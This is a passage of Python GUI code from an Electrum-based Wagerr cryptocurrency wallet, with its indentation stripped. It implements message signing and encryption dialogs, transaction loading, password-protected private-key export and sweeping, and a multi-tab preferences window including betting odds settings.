vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Wagerr address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Wagerr address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("wagerr:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
self.betting_history_list.update()
self.dice_history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.betting_history_list.update()
self.dice_history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.betting_history_list.update()
self.dice_history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list()
msg = (_('Base unit of your wallet.')
+ '\n1 {} = 1000 m{}.\n'.format(constants.net.SYMBOL,constants.net.SYMBOL)
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.betting_history_list.update()
self.dice_history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x) , True)
conf_only = self.config.get('confirmed_only', True)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
def on_odd_change(checked):
self.config.set_key('iseffectiveodds', checked)
self.need_restart = True
bet_widgets = []
current_odd = self.config.get("iseffectiveodds", True)
oddswitch = ToogleSwitch("","")
oddswitch.setChecked(current_odd)
oddswitch.clicked.connect(on_odd_change)
oddswitch_label = QLabel("On Chain Odds / Effective Odds")
oddswitch_label.setStyleSheet("font-weight: bold;")
bet_widgets.append((oddswitch_label,oddswitch))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
(bet_widgets, _('Betting'))
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
